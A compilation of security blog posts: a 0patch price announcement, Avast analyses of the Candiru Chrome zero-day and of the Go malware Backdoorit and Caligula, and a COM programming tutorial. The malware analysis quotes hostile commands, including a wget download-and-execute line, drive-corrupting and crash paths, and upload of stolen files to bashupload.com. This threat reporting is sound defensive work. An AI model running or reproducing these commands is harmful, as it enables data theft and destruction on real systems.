What was initially met with various skeptical remarks has now become a standard for protecting Windows computers in our customers' organizations who use 0patch both for keeping their legacy systems secure from old and new exploits, and for blocking 0day attacks while others are still waiting for original vendor fixes. We're happy to see our customers expanding their 0patch deployments and spreading the word to their peers.

To reflect the increased value and support further innovation and growth of our team, we're announcing our first price increase since our launch in 2019. This change, having been advertised on our pricing page for months, will go into effect on August 1, 2022, and will only apply to new subscriptions that get created on or after August 1, 2022; any existing subscriptions (including trials) will remain on the old pricing as long as they're renewed in time.

0patch PRO: Price of a PRO license will be increased for 2 EUR/year to 24,95 EUR/year (increase of 0,20 EUR/month).

0patch Enterprise: Price of an Enterprise license will be increased for 12 EUR/year to 34,95 EUR/year (increase of 1,20 EUR/month). We have until now offered Enterprise features for no extra charge but it's time to detach Enterprise pricing from PRO pricing to reflect the added value of Enterprise features.

Our mission has always been to help our users neutralize critical vulnerabilities in a low-effort, low-risk and affordable way before attackers start exploiting them. We remain committed to this mission and attentive to users' feedback when prioritizing new features that will make their work easier and their environments more secure.

Frequently Asked Questions

Is our current subscription going to be affected by this change?
No, existing subscriptions will remain on the old rates as long as they're renewed. Only newly created subscriptions will fall under the new price list.

Can we still change the number of licenses in our subscription while staying on the old rates?
Yes, you can do that - just make sure to keep the "Legacy" plan selected when modifying the subscription instead of selecting "PRO" or "Enterprise" plan, which use the new rates. 

As your existing partner - reseller or MSP - do we keep the old rates for existing customers' subscriptions?
Absolutely, as long as their subscriptions get renewed in time.

Can we just create a single-license subscription before August 1, and then increase license quantity later as needed to stay on the old prices?
Yes you can, you clever rascal, but hurry up!

The Return of Candiru: Zero-days in the Middle East

21 July 2022 at 12:24

We recently discovered a zero-day vulnerability in Google Chrome (CVE-2022-2294) when it was exploited in the wild in an attempt to attack Avast users in the Middle East. Specifically, a large portion of the attacks took place in Lebanon, where journalists were among the targeted parties.

The vulnerability was a memory corruption in WebRTC that was abused to achieve shellcode execution in Chrome’s renderer process. We reported this vulnerability to Google, who patched it on July 4, 2022.

Based on the malware and TTPs used to carry out the attack, we can confidently attribute it to a secretive spyware vendor of many names, most commonly known as Candiru. (A name the threat actors chose themselves, inspired by a horrifying parasitic fish of the same name.) 

After Candiru was exposed by Microsoft and CitizenLab in July 2021, it laid low for months, most likely taking its time to update its malware to evade existing detection. We’ve seen it return with an updated toolset in March 2022, targeting Avast users located in Lebanon, Turkey, Yemen, and Palestine via watering hole attacks using zero-day exploits for Google Chrome. We believe the attacks were highly targeted.

Exploit Delivery and Protection

There were multiple attack campaigns, each delivering the exploit to the victims in its own way. 

In Lebanon, the attackers seem to have compromised a website used by employees of a news agency. We can’t say for sure what the attackers might have been after, however often the reason why attackers go after journalists is to spy on them and the stories they’re working on directly, or to get to their sources and gather compromising information and sensitive data they shared with the press.

Interestingly, the compromised website contained artifacts of persistent XSS attacks, with there being pages that contained calls to the Javascript function alert along with keywords like test. We suppose that this is how the attackers tested the XSS vulnerability, before ultimately exploiting it for real by injecting a piece of code that loads malicious Javascript from an attacker-controlled domain. This injected code was then responsible for routing the intended victims (and only the intended victims) to the exploit server, through several other attacker-controlled domains.

The malicious code injected into the compromised website, loading further Javascript from stylishblock[.]com

Once the victim gets to the exploit server, Candiru gathers more information. A profile of the victim’s browser, consisting of about 50 data points, is collected and sent to the attackers. The collected information includes the victim’s language, timezone, screen information, device type, browser plugins, referrer, device memory, cookie functionality, and more. We suppose this was done to further protect the exploit and make sure that it only gets delivered to the targeted victims. If the collected data satisfies the exploit server, it uses RSA-2048 to exchange an encryption key with the victim. This encryption key is used with AES-256-CBC to establish an encrypted channel through which the zero-day exploits get delivered to the victim. This encrypted channel is set up on top of TLS, effectively hiding the exploits even from those who would be decrypting the TLS session in order to capture plaintext HTTP traffic.

Exploits and Vulnerabilities

We managed to capture a zero-day exploit that abused a heap buffer overflow in WebRTC to achieve shellcode execution inside a renderer process. This zero-day was chained with a sandbox escape exploit, which was unfortunately further protected and we were not able to recover it. We extracted a PoC from the renderer exploit and sent it to Google’s security team. They fixed the vulnerability, assigning it CVE-2022-2294 and releasing a patch in Chrome version 103.0.5060.114 (Stable channel). 

While the exploit was specifically designed for Chrome on Windows, the vulnerability’s potential was much wider. Since the root cause was located in WebRTC, the vulnerability affected not only other Chromium-based browsers (like Microsoft Edge) but also different browsers like Apple’s Safari. We do not know if Candiru developed exploits other than the one targeting Chrome on Windows, but it’s possible that they did. Our Avast Secure Browser was patched on July 5. Microsoft adopted the Chromium patch on July 6, while Apple released a patch for Safari on July 20. We encourage all other WebRTC integrators to patch as soon as possible.

At the end of the exploit chain, the malicious payload (called DevilsTongue, a full-blown spyware) attempts to get into the kernel using another zero-day exploit. This time, it is targeting a legitimate signed kernel driver in a BYOVD (Bring Your Own Vulnerable Driver) fashion. Note that for the driver to be exploited, it has to be first dropped to the filesystem (Candiru used the path C:\Windows\System32\drivers\HW.sys) and loaded, which represents a good detection opportunity.

The driver is exploited through IOCTL requests. In particular, there are two vulnerable IOCTLs: 0x9C40648C can be abused for reading physical memory and 0x9C40A4CC for writing physical memory. We reported this to the driver’s developer, who acknowledged the vulnerability and claimed to be working on a patch. Unfortunately, the patch will not stop the attackers, since they can just continue to exploit the older, unpatched driver. We are also discussing a possible revocation, but that would not be a silver bullet either, because Windows doesn’t always check the driver’s revocation status. Driver blocklisting seems to be the best solution for now.

One of the vulnerable ioctl handlers

While there is no way for us to know for certain whether or not the WebRTC vulnerability was exploited by other groups as well, it is a possibility. Sometimes zero-days get independently discovered by multiple groups, sometimes someone sells the same vulnerability/exploit to multiple groups, etc. But we have no indication that there is another group exploiting this same zero-day.

Because Google was fast to patch the vulnerability on July 4, Chrome users simply need to click the button when the browser prompts them to “restart to finish applying the update.” The same procedure should be followed by users of most other Chromium-based browsers, including Avast Secure Browser. Safari users should update to version 15.6

Indicators of Compromise (IoCs)

DevilsTongue paths

All .dll files might also appear with an additional .inf extension (e.g. C:\Windows\System32\migration\netiopmig.dll.inf)
Hijacked CLSIDs (persistence mechanism)
Registry keys Legitimate default values
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 %systemroot%\system32\wbem\wbemprox.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4FA18276-912A-11D1-AD9B-00C04FD8FDFF}\InprocServer32 %systemroot%\system32\wbem\wbemcore.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32 %systemroot%\system32\wbem\wbemsvc.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 %systemroot%\system32\wbem\wmiutils.dll

IoCs are also available in our IoC repository.

The post The Return of Candiru: Zero-days in the Middle East appeared first on Avast Threat Labs.

Go malware on the rise

13 July 2022 at 13:35


The Go programming language is becoming more and more popular. One of the reasons being that Go programs can be compiled for multiple operating systems and architectures in a single binary self containing all needed dependencies. Based on these properties, and as we expected, we observed an increase in the number of malware and gray tools written in Go programming language in the last months. We are discovering new samples weekly.

For instance, in late April, we discovered two new strains in our internal honeypots, namely Backdoorit and Caligula, both of which were at that time undetected on VT.

Both of these malware strains are multiplatform bots compiled for many different processor architectures and written in the Go programming language.

Analyzing Backdoorit

Backdoorit (version 1.1.51562578125) is a multiplatform RAT written in Go programming language and supporting both Windows and Linux/Unix operating systems. In many places in the code it’s also referred to as backd00rit.

Based on the close inspection of the analyse-full command of Backdoorit, we concluded that the main purpose of this malware is stealing Minecraft related files, Visual Studio and Intellij projects.

But the malware is not limited just to those files. Some commands (upload, basharchive, bashupload and so on) allow it to steal arbitrary files and information, install other malware in the system or run arbitrary commands (run, run-binary, etc.) and take screenshots of the user activity (screenshot, ssfile and so on).

Evidence indicates that the Backdoorit developer is not a native English speaker, further pointing to a possible Russian threat actor. The comments and strings in the code are mostly written in English but often grammatically incorrect. For instance, we found the message: “An confirmation required, run ”. We also discovered some isolated strings written in the Russian language.

In addition to the aforementioned strings we also observed that, amongst others, the VimeWorld files (a Russian project that offers Minecraft servers) are being targeted. This further leads us to believe the Russian origin of the threat actor behind this malware.

After running Backdoorit the RAT retrieves some basic environment information such as the current operating system and the name of the user. It then continuously tries to connect to a C&C server to give the attacker access to a shell.

The malware logs all executed operations and taken steps via a set of backd00r1t_logging_* functions. Those logs can be uploaded to the server of the attacker either by using uploadlogs and uploadlogs-file shell commands or automatically in case a Go panic exception is raised.

In such case backd00r1t_backdoor_handlePanic handles the exception and performs the following actions:

  1. It first sends the logs to the endpoint /api/logs of the C&C server with a JSON request structure as defined in the function: backd00r1t_api_SendLogs.
  2. It closes the connection with the C&C server.
  3. It attempts to reconnect again.

The mentioned handler helps to keep the bot connected and also allows the attacker to remotely follow the execution trace.

Once the connection to C&C succeeds, the attacker gets the context information listed below. The function backd00r1t_backdoor_SocketConnectionHandle is responsible for handling all the commands supported by this RAT and first calls to backd00r1t_backdoor_printMotd for displaying such information:

  • Last connected time
  • The Backdoorit version
  • Process
  • Active connections
  • User name
  • User home
  • User id
  • Login
  • Gid
  • Process path
  • Modules Autostart state

The shell allows the threat actor to remotely execute arbitrary commands. The first command that is likely to be run is the analyse-full command because it generates a report.txt file containing the Desktop, Documents, Downloads, Minecraft and VimeWorld folder file trees and uploads the mentioned report and both Visual Studio and IntelliJ projects folders contents, to Bashupload, a web service allowing to upload files from command line with a storage limitation of 50GB.

As mentioned earlier, if the attacker chooses to do so, he/she will be also able to implant other malware in the system. The threat actor can use the commands: run-binary (a command for downloading and executing a script), shell (a command allowing to spawn the operating system shell and execute arbitrary commands) or other available commands.

The malware also contains a sort of a “kill-switch” that can be triggered by the exploit command, but in this case this does not simply remove the malware itself, but has the ability to crash the Windows operating system by exploiting CVE-2021-24098 and also corrupt the NTFS of the hard disk via CVE-2021-28312 on vulnerable systems. This leads to complete loss of file information (including size, time and date stamps, permissions and data content) as well as, of course, removing evidence of the infection.

There are many more commands implemented in the shell that you can check at the corresponding section of the Appendix. As you will notice, the malware incorporates a checkupdates command so we may expect to see new versions of Backdoorit soon.

Analyzing Caligula

Caligula is a new IRC multiplatform malicious bot that allows to perform DDoS attacks.

The malware was written in Go programming language and distributed in ELF files targeting several different processor architectures:

  • Intel 80386 32-bit
  • ARM 32-bit
  • PowerPC 64-bit
  • AMD 64-bit

It currently supports Linux and Windows platforms via WSL and uses the function os_user_Current for determining the underlying operating system.

Caligula is based on the Hellabot open source project, an easily modifiable event based IRC bot with the ability to be updated without losing connection to the server.

Of course, more code reuse was found in the Caligula coming from open source projects (log15, fd, go-shellwords, go-isatty and go-colorable) but the core functionality is based on Hellabot.

All the samples that we hunted in the wild are prepared to connect to the same hardcoded IRC channel by using the following data:

  • Host:
  • Channel: #caligula
  • Username: It is composed of the platform, current user and a pseudo-random number.
    • e.g. [LINUX]kali-11066

As shown in the following screenshot, the bot is prepared for joining the Caligula IRC Net v1.0.0 botnet.

Caligula IRC Net v1.0.0 is a botnet ready for flooding. The bots offers to the attacker the following attacks:

Attack Description
udp udp flood with limited options.
http http flood with no options at all.
syn syn flood.
handshake handshake flood.
tcp tcp flood.

For more information on how Caligula bot source code is organized, check the source code file listing available in the appendix. It can be useful for getting a high level perspective on the malware design, notice that new attack methods can be easily added to it and identify the Caligula malware family.


Due to its native multiplatform support and relative ease of development, the use of Go programming language for malicious purposes is currently growing, especially in malware targeting Unix/Linux operating systems.

Naturally with the growing interest and community around the Go programming language, some of the malicious tools are being open sourced on Github and resued by different threat actors.

In this instance, we were one of the firsts in hunting and detecting Backdoorit and Caligula.


Backdoorit shell commands reference

Command syntax Description
shell This command spawns a shell. For Windows platforms, if available, it executes Powershell. Otherwise it executes the Command prompt. For the rest of the platforms, it spawns a Bash Unix shell.
help Shows the help containing the available commands but also some status information.
toggle-path Enables or disables showing the toggle path.
bell Enables or disables the bell sound.
clear-fallback Clears the screen.
background-logs Asks to the attacker for the buffer size and the maximum buffer size in order to store the logs in background.
backdoor Shows the RAT information: BuiltCodenameVersionReconnect time
clear-code Resets any style property of the font by using the ANSI Escape Codes : \x1B[0J
clear-color Clears the shell coloring.
colors / color Enables or Disables the shell coloring.
un-export [env][fir][key][url] Removes an environment variable.
export Adds an environment variable.
mkdir [path] Creates a folder for the specified path.
exit Exits.
wcd Prints the working directory.
motd Prints the following information: Last connected time. The Backdoorit version. ProcessActiveConnectionsUser nameUser homeUser idLoginGidProcess path The modules Autostart state.
get-asset [asset] Access to an asset (those are identified by string and accessed via GO language mapaccess1_faststr function)
extract-asset [asset] (path) Extracts an asset to the specified path.
safe Allows to disable safe mode
open-file Open file.
open Open url in browser.
list-windows-disks List disks (command available for Windows systems)
cp [target] [dist] Copy file.
rm Removes a file or a folder and all its content.
If the attacker is trying to remove the entire current folder, the agent asks her/him for preventing the human error.
cd Changes the working directory.
ls It shows the modification date, Filename and Size.
cat [file][path] Read file.
checkupdates It asks for the version to the endpoint: /api/version
If there is a new version available for the appropriate operating system, then it downloads it by using wget:
wget -O app –user nnstd –password access && chmod +x app && ((./app) &)
exploit [exploit] […args] Runs an exploit. It currently supports the following exploits: windows/crash/uncIt crashes Windows by accessing the file:
\\.\globalroot\device\condrv\kernelconnectwindows/destroy/i30It corrupts the drive by executing the following command: cd C:\\:$i30:$bitmap
autostart It persists the payload by modifying the following files: .bashrc .profile .zshrc .bash_profile .config/fish/config.fish This command enables the internal flag: backd00r1t_modules_autostart_state
autostart-update Update autostart.
exec [cmd] […args] Executes a command with the specified arguments.
sysinfo {detailed} Shows the following system information:
WorkingDirectory, Command line, User, Terminal
neofetch / screenfetch Shows the following system information: CPU Info: Family, Vendor, PhysicalID. CoresHost InfoUptime, OS, Platform, Platform Family, Platform Version, Host ID, Kernel Arch, Kernel Version, Network Interfaces Info: HW Addr, Flags, Index
Screenshot / ssfile / screen It creates a screenshot, and stores it in a PNG file located in one of the following directories. It depends on the platform: Windows: C:\Users\{username}\AppData\Local\Temp Linux: /tmp/ Finally, the screenshot is uploaded and, after that, it removes the file from disk.
archiveapi It creates a file following the format:
tmp-archive-{current_date}.gdfgdgd For Windows platforms: C:\\Users\\{username}\\AppData\\Local\\Temp For Linux platforms: /tmp/ The function removes the previous file in case a file with the same name does exist. Then it sends the file and after that, removes the file
Create-archive [output] [target] Create archive with files from target in output.
Uploadapi [file][path] Automatically uploads the file specified to predefined servers.
uploadlogs-file Uses the /api/upload API endpoint for uploading the file agent.log
uploadlogs It sends the logs to the API endpoint /api/logs in JSON format.
upload [url] [file] Upload file to Server (HTTP).
bashupload [file][path] Automatically upload file to https://bashupload.com/
bashdownload Access the file in https://bashupload.com/ with the parameter: ?download=1
bashupload-parse [file][path] Automatically upload file to https://bashupload.com/ and get direct link
basharchive [target] Create archive and upload it to bashupload.com:
download Downloads a file.
bashdownload [url] Downloads the file by querying the url: https://bashupload.com/
With the parameter: ?download=1
run [url] Download script and run it.
run-binary Download script, and run it. Currently, it only supports Windows platforms. It downloads the run-script.ps1 file to a temporary folder and executes it.
cls Clear screen.
$STOP This command stops Backdoorit.
analyse-full It creates a report report.txt containing:{USERHOME}\source\repos{USERHOME}\IdeaProjectsDesktop file tree Documents file tree Downloads file tree AppData\Roaming\.minecraft file tree AppData\Roaming\.vimeworld file tree. It uploads the files in Visual Studio repos folder and IntelliJ projects folder via backd00r1t_analyze_uploadDirectorybut also a report of the files in the main computer folders via backd00r1t_analyze_uploadFile

Backdoorit bot source code listing

  • H:/backdoorIt//injected/backdoor/BackdoorEnvironment.go
  • H:/backdoorIt//injected/backdoor/BackgroundTasks.go
  • H:/backdoorIt//injected/backdoor/CommandHelpers.go
  • H:/backdoorIt//injected/backdoor/ConnectionHandler.go
  • H:/backdoorIt//injected/files/Assets.go
  • H:/backdoorIt//injected/api/Configuration.go
  • H:/backdoorIt//injected/backdoor/ExecHandlers.go
  • H:/backdoorIt//injected/backdoor/ExecHandlers__linux.go
  • H:/backdoorIt//injected/backdoor/main.go
  • H:/backdoorIt//injected/launcher/main.go

Caligula bot source code listing

  • /root/irc/bot/attack/attack.go
  • /root/irc/bot/attack/methods.go
  • /root/irc/bot/attack/parser.go
  • /root/irc/bot/attack/flags.go
  • /root/irc/bot/network/header.go
  • /root/irc/bot/network/ip.go
  • /root/irc/bot/network/tcp.go
  • /root/irc/bot/routine/timedRoutine.go
  • /root/irc/bot/attack/methods/httpflood.go
  • /root/irc/bot/attack/methods/sshflood.go
  • /root/irc/bot/attack/methods/synflood.go
  • /root/irc/bot/attack/methods/tcpflood.go
  • /root/irc/bot/attack/methods/udpflood.go
  • /root/irc/bot/handle.go
  • /root/irc/bot/singleInstance/singleinstance.go
  • /root/irc/bot.go



  • 34366a8dab6672a6a93a56af7e27722adc9581a7066f9385cd8fd0feae64d4b0


  • 147aac7a9e7acfd91edc7f09dc087d1cd3f19c4f4d236d9717a8ef43ab1fe6b6
  • 1945fb3e2ed482c5233f11e67ad5a7590b6ad47d29c03fa53a06beb0d910a1a0
  • 4a1bb0a3a83f56b85f5eece21e96c509282fec20abe2da1b6dd24409ec6d5c4d
  • 6cfe724eb1b1ee1f89c433743a82d521a9de87ffce922099d5b033d5bfadf606
  • 71b2c5a263131fcf15557785e7897539b5bbabcbe01f0af9e999b39aad616731
  • 99d523668c1116904c2795e146b2c3be6ae9db67e076646059baa13eeb6e8e9b
  • fe7369b6caf4fc755cad2b515d66caa99ff222c893a2ee8c8e565121945d7a9c
  • 97195b683fb1f6f9cfb6443fbedb666b4a74e17ca79bd5e66e5b4e75e609fd22
  • edcfdc1aa30a94f6e12ccf3e3d1be656e0ec216c1e852621bc11b1e216b9e001

The complete Backdoorit and Caligula IoCs are in our IoC repository.

The post Go malware on the rise appeared first on Avast Threat Labs.

COM+ revisited

17 January 2022 at 07:40

More than ten years ago (how time flies!), when I published the basic sample of a COM+ server and client, I thought that I wouldn’t be touching this subject again. But here we are, in 2022, and I have so much interaction with COM at work that I decided to write a new, updated, and a bit more detailed post about this technology 😁 I don’t want to convince you to use COM as the backbone for your new applications. Instead, I want to show you how you may approach and use COM APIs if you need to work with them. We will also do some COM debugging in WinDbg. Additionally, I plan to release a new COM troubleshooting tool as part of the wtrace toolkit. Remember to subscribe to wtrace updates if you’re interested.

Today’s post will continue using the old Protoss COM classes, but we will update the code with various modern ideas. As you may remember, Nexus and Probe classes represent Blizzard’s Starcraft game objects. Nexus is a building that may produce Probes (CreateUnit method in the INexus interface), and Probe may build various structures, including Nexuses (ConstructBuilding method in the IProbe interface). I also added a new IGameObject interface, shared by Nexus and Probe, that returns the cost in minerals and the time needed to build a given game object. In IDL, it looks as follows:

[object, uuid(59644217-3e52-4202-ba49-f473590cc61a)]
interface IGameObject : IUnknown
    HRESULT Name([out, retval] BSTR* name);

    HRESULT Minerals([out, retval]LONG* minerals);

    HRESULT BuildTime([out, retval]LONG* buildtime);

I also added a type library to the IDL:

    helpstring("Protoss 1.0 Type Library")
library ProtossLib

    interface INexus;
    interface IProbe;

        helpstring("Nexus Class")
    coclass Nexus {
        [default] interface INexus;
        interface IGameObject;

        helpstring("Probe Class")
    coclass Probe {
        [default] interface IProbe;
        interface IGameObject;

If we run midl.exe after this change, it will generate a type library file (protoss.tlb). The type library provides a language-agnostic way to access COM metadata. For example, we may import it to a .NET assembly using the tlbimp.exe tool from .NET Framework SDK.

Updating the Protoss COM server

As you remember, the COM server requires a few DLL exports to make its COM classes instantiable. One of them is DllGetClassObject. The DllGetClassObject function from the old post directly constructed the Nexus and Probe objects. The more common approach is to return an IClassFactory instance for each implemented class and let the clients call its CreateInstance method. The clients often do this implicitly by calling the CoCreateInstance or CoCreateInstanceEx functions. These functions first ask for a class factory object and later use it to create a requested class instance. Supporting IClassFactory is straightforward:

STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv) {
	if (rclsid == __uuidof(Nexus)) {
		static ProtossObjectClassFactory<Nexus, INexus> factory{};
		return factory.QueryInterface(riid, ppv);
    if (rclsid == __uuidof(Probe)) {
		static ProtossObjectClassFactory<Probe, IProbe> factory{};
		return factory.QueryInterface(riid, ppv);

The ProtossObjectClassFactory is a class template implementing the IClassFactory interface. I want to bring your attention to the CreateInstance method:

HRESULT __stdcall CreateInstance(IUnknown* pUnkOuter, REFIID riid, void** ppv) override {
    if (pUnkOuter) {

    try {
        wil::com_ptr_t<IUnknown> unknown{};
        // attach does not call AddRef (we set ref_count to 1 in COM Objects)
        unknown.attach(static_cast<IT*>(new T()));
        return unknown->QueryInterface(riid, ppv);
    } catch (const std::bad_alloc&) {
        return E_OUTOFMEMORY;

    return S_OK;

It uses the wil::com_ptr_t class. It’s one of the many smart pointers provided by Windows Implementation Library. Thanks to wil::com_ptr_t or wil::unique_handle, we no longer need to call Release or CloseHandle methods explicitly – they are called automatically in the smart pointer destructors. Thus, we free the resources when the pointers go out of scope. WIL and modern C++ really make using RAII with Windows API straightforward 😁.

One missing piece in the old code was registration. I used reg files to register the Protoss COM library in the system. It’s not the best way to do so, and, instead, we should implement DllRegisterServer and DllUnregisterServer functions so that the clients may register and unregister our library with the regsvr32.exe tool. The code presented below is based on the sample from the great Windows 10 System Programming book by Pavel Yosifovich. Only in my version, I used WIL, and you may quickly see its usage benefits when you look at the original version (for example, no calls to CloseHandle and no error checks thanks to WIL result macros):

std::array<std::tuple<std::wstring_view, std::wstring, std::wstring>, 2> coclasses{
	std::tuple<std::wstring_view, std::wstring, std::wstring> { L"Protoss Nexus", wstring_from_guid(__uuidof(Nexus)), L"Protoss.Nexus.1" },
	std::tuple<std::wstring_view, std::wstring, std::wstring> { L"Protoss Probe", wstring_from_guid(__uuidof(Probe)), L"Protoss.Probe.1" },

STDAPI DllRegisterServer() {
	auto create_reg_subkey_with_value = [](HANDLE transaction, HKEY regkey, std::wstring_view subkey_name, std::wstring_view subkey_value) {
		wil::unique_hkey subkey{};
		RETURN_IF_WIN32_ERROR(::RegCreateKeyTransacted(regkey, subkey_name.data(), 0, nullptr, REG_OPTION_NON_VOLATILE,
			KEY_WRITE, nullptr, subkey.put(), nullptr, transaction, nullptr));
		RETURN_IF_WIN32_ERROR(::RegSetValueEx(subkey.get(), nullptr, 0, REG_SZ,
			reinterpret_cast<const BYTE*>(subkey_value.data()), static_cast<DWORD>((subkey_value.size() + 1) * sizeof(wchar_t))));

		return S_OK;

	wil::unique_handle transaction{ ::CreateTransaction(nullptr, nullptr, TRANSACTION_DO_NOT_PROMOTE, 0, 0, INFINITE, nullptr) };

	for (const auto& coclass : coclasses) {
		auto name{ std::get<0>(coclass) };
		auto clsid{ std::get<1>(coclass) };
		auto progId{ std::get<2>(coclass) };

		wil::unique_hkey regkey{};
		// CLSID
		RETURN_IF_WIN32_ERROR(::RegCreateKeyTransacted(HKEY_CLASSES_ROOT, (L"CLSID\\" + clsid).c_str(),
			0, nullptr, REG_OPTION_NON_VOLATILE, KEY_WRITE, nullptr, regkey.put(), nullptr, transaction.get(), nullptr));
		RETURN_IF_WIN32_ERROR(::RegSetValueEx(regkey.get(), L"", 0, REG_SZ,
			reinterpret_cast<const BYTE*>(name.data()), static_cast<DWORD>((name.size() + 1) * sizeof(wchar_t))));

		RETURN_IF_FAILED(create_reg_subkey_with_value(transaction.get(), regkey.get(), L"InprocServer32", dll_path));
		RETURN_IF_FAILED(create_reg_subkey_with_value(transaction.get(), regkey.get(), L"ProgID", dll_path));

		// ProgID
		RETURN_IF_WIN32_ERROR(::RegCreateKeyTransacted(HKEY_CLASSES_ROOT, progId.c_str(),
			0, nullptr, REG_OPTION_NON_VOLATILE, KEY_WRITE, nullptr, regkey.put(), nullptr, transaction.get(), nullptr));
		RETURN_IF_WIN32_ERROR(::RegSetValueEx(regkey.get(), L"", 0, REG_SZ,
			reinterpret_cast<const BYTE*>(name.data()), static_cast<DWORD>((name.size() + 1) * sizeof(wchar_t))));

		RETURN_IF_FAILED(create_reg_subkey_with_value(transaction.get(), regkey.get(), L"CLSID", clsid));


	return S_OK;

As you maybe noticed, I also added the registration of ProgIDs (Protoss.Nexus.1 and Protoss.Probe.1), which are human-friendly names for our COM classes. With these functions implemented, registering our COM classes is now a matter of calling regsvr32.exe protoss.dll from the administrator’s command line.

Updating the Protoss COM client

Thanks to the type library, we no longer need to explicitly generate and include the header files, but we may import the type library directly into the source code. The #import directive that we use for this purpose has several attributes controlling the representation of the type library in C++. For example, in the Protoss COM client, I’m using the raw_interfaces_only attribute as I want to work with the Protoss interfaces directly using the WIL com_ptr_t smart pointers. Our COM server uses IClassFactory, so we may call the CoCreateInstance function to create an instance of the Nexus class:

#include <iostream>

#include <Windows.h>
#include <wil/com.h>

#import "..\protoss.tlb" raw_interfaces_only

using namespace ProtossLib;

HRESULT show_game_unit_data(IUnknown* unknwn) {
    wil::com_ptr_t<IGameObject> unit{};

    wil::unique_bstr name{};
    LONG minerals;
    LONG buildtime;

    std::wcout << L"Name: " << name.get() << L", minerals: " << minerals
        << L", build time: " << buildtime << std::endl;

    return S_OK;

void start_from_probe() {
	wil::com_ptr_t<IProbe> probe{};

	THROW_IF_FAILED(::CoCreateInstance(__uuidof(Probe), nullptr, CLSCTX_INPROC_SERVER, __uuidof(IProbe), probe.put_void()));

	auto name{ wil::make_bstr(L"Nexus") };
	wil::com_ptr_t<INexus> nexus{};
	THROW_IF_FAILED(probe->ConstructBuilding(name.get(), nexus.put_unknown()));

int main(int argc, char* argv[]) {

    try {
        // a "smart call object" that will execute CoUnitialize in destructor
        auto runtime{ wil::CoInitializeEx(COINIT_APARTMENTTHREADED) };


        return 0;
    } catch (const wil::ResultException& ex) {
        std::cout << ex.what() << std::endl;
        return 1;
    } catch (const std::exception& ex) {
        std::cout << ex.what() << std::endl;
        return 1;

If you run the client, you should see the calls to the QueryInterface method and logs from constructors and destructors in the console:

Component: Nexus::QueryInterface: 246a22d5-cf02-44b2-bf09-aab95a34e0cf
Component: Probe::AddRef() ref_count = 2
Component: Probe::Release() ref_count = 1
Component: Probe::AddRef() ref_count = 2
Component: Probe::Release() ref_count = 1
Component: Nexus::QueryInterface: 246a22d5-cf02-44b2-bf09-aab95a34e0cf
Component: Probe::AddRef() ref_count = 2
Component: Probe::Release() ref_count = 1
Component: Nexus::QueryInterface: 59644217-3e52-4202-ba49-f473590cc61a
Component: Probe::AddRef() ref_count = 2
Name: Probe, minerals: 50, build time: 12
Component: Probe::Release() ref_count = 1
Component: Nexus::QueryInterface: 59644217-3e52-4202-ba49-f473590cc61a
Component: Nexus::AddRef() ref_count = 2
Name: Nexus, minerals: 400, build time: 120
Component: Nexus::Release() ref_count = 1
Component: Nexus::Release() ref_count = 0
Component: Nexus::~Nexus()
Component: Probe::Release() ref_count = 0
Component: Probe::~Probe()

We can see that all class instances are eventually freed, so, hurray 🎉, we aren’t leaking any memory!

If you’d like to practice writing COM client code, you may implement a start_from_nexus function to output the same information, but create the Nexus class first. Don’t look at the client code in the repository, as this function is already there 😊

C++ is not the only language to write a COM client. Let’s now implement the same logic in C#. I picked C# not without reason. .NET Runtime provides excellent support for working with native COM objects. Each COM class receives a Runtime Callable Wrapper that makes the COM class look like any other .NET class. Now, you can imagine the number of magic layers to make it happen. So, there is no surprise that sometimes, you may need to wear a magical debugging hat to resolve a problem in COM interop 😅 But if you look at the code, it’s effortless:

using ProtossLib;

public static class Program
    static void ShowGameUnitData(IGameObject go)
        Console.WriteLine($"Name: {go.Name}, minerals: {go.Minerals}, build time: {go.BuildTime}");

    static void StartingFromProbe()
        var probe = new Probe();

        var nexus = probe.ConstructBuilding("Nexus");

        //_ = Marshal.ReleaseComObject(nexus);
        //_ = Marshal.ReleaseComObject(probe);

    static void Main()

        // force release of the COM objects

If you decompile the ProtossLib.dll assembly, you will discover that Probe is, in fact, an interface with a CoClass attribute. And, although it does not implement IGameObject, we may cast it to IGameObject. Magical, isn’t it? 😊 Mixed-mode debugging helps a lot when debugging COM interop in .NET. For example, if you set a breakpoint on the QueryInterface method in the Probe class, you will discover that it i called when you cast the managed Probe instance to IGameObject.

Debugging COM in WinDbg

In this paragraph, I want to focus on debugging COM servers and clients in WinDbg. I will show you some commands, hoping they will be helpful also in your COM troubleshooting.

Let’s start with a breakpoint on the typical entry point for creating COM objects, i.e., the CoCreateInstance function (if the COM client does not use CoCreateInstance, you may set a breakpoint on the CoGetClassObject function):

HRESULT CoCreateInstance(
  [in]  REFCLSID  rclsid,
  [in]  LPUNKNOWN pUnkOuter,
  [in]  DWORD     dwClsContext,
  [in]  REFIID    riid,
  [out] LPVOID    *ppv

Our goal is to print the function parameters (CLSID, IID, and the object address), so we know which object the client creates. If we have combase.dll private symbols, it’s a matter of calling the dv command. Otherwise, we need to rely on the dt command. For 32-bit, I usually create the CoCreateInstance breakpoint as follows:

bp combase!CoCreateInstance "dps @esp L8; dt ntdll!_GUID poi(@esp + 4); dt ntdll!_GUID poi(@esp + 10); .printf /D \"==> obj addr: %p\", poi(@esp+14);.echo; bp /1 @$ra; g"

And the 64-bit version is:

bp combase!CoCreateInstance "dps @rsp L8; dt ntdll!_GUID @rcx; dt ntdll!_GUID @r9; .printf /D \"==> obj addr: %p\", poi(@rsp+28);.echo; bp /1 @$ra; g"

I’m using bp /1 @$ra; g to break at the moment when the function returns. I didn’t want to use, for example, gu because one CoCreateInstance may call another CoCreateInstance, and one-time breakpoints are more reliable in such situations. An example 32-bit breakpoint hit might look as follows (notice that when we have private symbols, dps command nicely prints the GUIDs):

009cfe00  008c36ae ProtossComClient!main+0x6e
009cfe04  008c750c ProtossComClient!_GUID_eff8970e_c50f_45e0_9284_291ce5a6f771
009cfe08  00000000
009cfe0c  00000001
009cfe10  008c74b4 ProtossComClient!_GUID_246a22d5_cf02_44b2_bf09_aab95a34e0cf
